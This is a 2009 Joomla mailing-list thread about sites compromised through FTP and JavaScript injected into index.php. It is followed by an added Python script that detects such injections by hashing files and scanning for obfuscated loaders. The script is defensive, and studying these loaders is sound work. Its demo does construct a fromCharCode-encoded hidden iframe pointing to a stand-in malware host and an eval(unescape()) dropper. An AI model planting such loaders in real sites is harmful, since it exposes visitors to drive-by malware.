[joomla] several 1.0 sites hacked this week!

Barrie North barrie at compassdesigns.net
Thu Mar 26 20:04:54 EDT 2009


We found the attacks/IP in the server logs. A financially backed hacker
outfit from Nigeria, go figure. The joys of having a PR9 site =P

Our password was 10 chars including letters, numbers and punctuation. We are
hosted on a "secured" rackspace server.

We don't have FTP running any more!

Barrie North
~Fully Managed Joomla Sites~
www.simplweb.com/joomla
~Join the Community at compassdesigns.net~
www.compassdesigns.net/join-the-community.html


On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirjavid at gmail.com> wrote:

> Hello Barrie,
>
> May I inquire as to how you verified the attack?  I know that FTP
> bruteforcing is extremely difficult, and that is very improbable.
> What you may have faced was a dictionary attack, which may have worked
> with some luck if you had a weak password.  With a password including a
> mix of
>
> 1) UPPERCASE
> 2) lowercase
> 3) punctuation/!#$.,
> 4) numbers
>
> and a good strong/long password, you would never fall victim to a
> dictionary attack.
>
> As for bruteforce, an ftpd simply denies access after 3 or 5
> (configurable, usually defaults to 3) failed login attempts for some
> time.  Some hosts go as far as restricting ftp access until you call
> them and verify the problem.  Also, brute forcing a slow protocol such
> as FTP over a TCP pipe is virtually impossible.  At this rate it
> would take YEARS to bruteforce the password, if not DECADES.
>
> @ Other users
> Also make sure to go into the Joomla user configuration and change the
> username 'admin' to something else.
> To protect your Joomla administration section, if you have a static IP,
> you can add
>
> order allow,deny
> deny from all
> allow from your.static.ip.here
>
> to a file called .htaccess in your administration folder.  If for some
> reason your ip changes and you get locked out, simply login via FTP
> and update the .htaccess file.  There are some other advanced methods
> for protecting your administration folder.
>
> Also, FTP was a protocol developed 30+ years ago.  It is not secure:
> clear text authentication, etc.  FTP must go.  If you can help it, do
> not use FTP; use SFTP or SSH instead.  Just... anything but FTP.  Sadly,
> that's all that is easy to use and highly available across all hosts,
> and not everyone on shared hosting provides SSH access.  If you can do
> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
>
> I have seen more sites hacked due to unpatched PHP or bad PHP code
> (mostly from 3rd party addons) than I have with FTP, though.
>
> Still with good security practices you can reduce the risk considerably.
>
> Peace.
>
>
>
>
> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
> > We got hacked last month by a brute force attack on our FTP password.
> Once
> > they had that, they got into the Joomla files.
> >
> > Any site can be hacked. The other half of the equation is vigilance and
> > backups :)
> >
> > Barrie North
> > ~Fully Managed Joomla Sites~
> > www.simplweb.com/joomla
> > ~Join the Community at compassdesigns.net~
> > www.compassdesigns.net/join-the-community.html
> >
> >
> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masimko at verizon.net>
> wrote:
> >>
> >> Several of my clients' 1.0.15 sites have been hacked this week!  Is
> >> there a problem with 1.0?
> >>
> >> I don't see an announcement on joomla.org
> >>
> >> I just saw that my site was hacked the other day. Fortunately they
> >> bunged it up a bit, so the code didn't run, but instead gave an error
> >> message.
> >>
> >> What they had done is append JavaScript to the index.php file. It was
> >> disguised as ASCII codes, and there were several vars defined and
> >> substituted in, but the result was that it attempted to open a hidden
> >> iframe directed to siplank.com. When I tried to open siplank.com in a
> >> web browser (yes, I did that! I do lots of crazy things out of
> >> curiosity) Firefox stopped it with a warning about the site being known
> >> for malware.
> >>
> >> I'm running 1.5.9 on a shared host. I will be calling my host and asking
> >> them what they can find out from their logs as to what happened.
> >>
> >> _______________________________________________
> >> New York PHP SIG: Joomla! Mailing List
> >> http://lists.nyphp.org/mailman/listinfo/joomla
> >>
> >> NYPHPCon 2006 Presentations Online
> >> http://www.nyphpcon.com
> >>
> >> Show Your Participation in New York PHP
> >> http://www.nyphp.org/show_participation.php
> >
> >
>
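The injection Mark describes (JavaScript appended to index.php, the iframe markup hidden as a list of character codes, written out through a few substituted variables) is easy to catch once you have a known-good copy of the tree to compare against. The script below is an added example written for this page; it is not code from the thread or from Joomla. It builds a SHA-256 baseline of every PHP/JS/HTML file, re-hashes the tree, and for each new or changed file decodes `String.fromCharCode(...)` runs and looks for hidden iframes and `eval(unescape(...))` loaders in both the raw and the decoded text. The site tree, file contents and the host name `malware.invalid` are all constructed so the demo runs offline; on a real site you would take the baseline from a fresh install or a backup, not from the tree you suspect.

```python
"""Added example (not from the thread or Joomla): find injected, obfuscated
JavaScript by hashing site files against a known-good baseline and scanning
new/changed files for character-code runs, eval(unescape()) loaders and
hidden iframes. All paths, contents and malware.invalid are constructed."""
import hashlib
import os
import re
import tempfile

SCAN_SUFFIXES = (".php", ".js", ".html", ".htm")

# Indicators of this style of injection: long runs of character codes,
# eval(unescape(...)) loaders, and iframes styled or sized to be invisible.
INDICATORS = {
    "fromCharCode-run": re.compile(
        r"String\.fromCharCode\s*\(\s*\d+(?:\s*,\s*\d+){7,}", re.I),
    "eval-unescape": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "hidden-iframe": re.compile(
        r"<iframe\b[^>]*?(?:visibility\s*:\s*hidden|display\s*:\s*none"
        r"|width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b)", re.I),
}
CHARCODE_CALL = re.compile(r"String\.fromCharCode\s*\(([\d\s,]+)\)", re.I)


def decode_fromcharcode(text):
    """Replace each String.fromCharCode(60,105,...) call with the text it builds."""
    def _decode(match):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        return "".join(chr(c) for c in codes if 0 <= c < 0x110000)
    return CHARCODE_CALL.sub(_decode, text)


def scan_text(text):
    """Return the sorted indicator names matching the raw or the decoded text."""
    decoded = decode_fromcharcode(text)
    return sorted(name for name, pat in INDICATORS.items()
                  if pat.search(text) or pat.search(decoded))


def file_digest(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each scannable file under root (relative path) to its SHA-256."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_SUFFIXES):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = file_digest(full)
    return baseline


def audit(root, baseline):
    """Report every file that is new, changed or missing versus the baseline,
    with content indicators for new and changed files. Files whose hash still
    matches are skipped: they are byte-identical to the known-good copy."""
    current = build_baseline(root)
    report = {}
    for rel in sorted(set(current) | set(baseline)):
        if rel not in current:
            report[rel] = {"status": "missing", "indicators": []}
            continue
        if rel in baseline and current[rel] == baseline[rel]:
            continue
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            indicators = scan_text(fh.read())
        report[rel] = {"status": "changed" if rel in baseline else "added",
                       "indicators": indicators}
    return report


def charcodes(s):
    """Encode a string the way the injected script did: as decimal char codes."""
    return ",".join(str(ord(c)) for c in s)


# Constructed stand-ins for site files, the appended loader and a dropped file.
CLEAN_INDEX = "<?php\n// constructed stand-in for a Joomla index.php\ndefine('_JEXEC', 1);\n"
HIDDEN_IFRAME = ('<iframe src="http://malware.invalid/in.php" width="0" height="0" '
                 'style="visibility:hidden"></iframe>')
INJECTED_TAIL = ("<script>var a=String.fromCharCode(%s);var d=document;"
                 "d.write(a);</script>\n" % charcodes(HIDDEN_IFRAME))
DROPPED_FILE = "<script>eval(unescape('%3C%69%66%72%61%6D%65%3E'));</script>\n"


def demo():
    """Build the constructed tree, take a baseline, simulate the compromise, audit."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "administrator"))
        files = {"index.php": CLEAN_INDEX,
                 os.path.join("administrator", "index.php"): CLEAN_INDEX,
                 "configuration.php": "<?php\nclass JConfig { var $offline = '0'; }\n"}
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        baseline = build_baseline(root)
        with open(os.path.join(root, "index.php"), "a", encoding="utf-8") as fh:
            fh.write(INJECTED_TAIL)   # loader appended to an existing file
        with open(os.path.join(root, "cache.php"), "w", encoding="utf-8") as fh:
            fh.write(DROPPED_FILE)    # a new file the baseline never saw
        return audit(root, baseline)


if __name__ == "__main__":
    for rel, finding in demo().items():
        print(rel, finding["status"], ",".join(finding["indicators"]) or "-")
```

The hash comparison is the part that actually matters: a shared host's copy of Joomla has plenty of legitimate `fromCharCode` and `eval` in bundled editors and scripts, so scanning every file for indicators alone produces noise, while a file that changed since the baseline and now decodes to an invisible iframe is worth a look regardless of how the string was disguised. Keep the baseline off the web server; an attacker with write access to the document root can rewrite a baseline stored beside it.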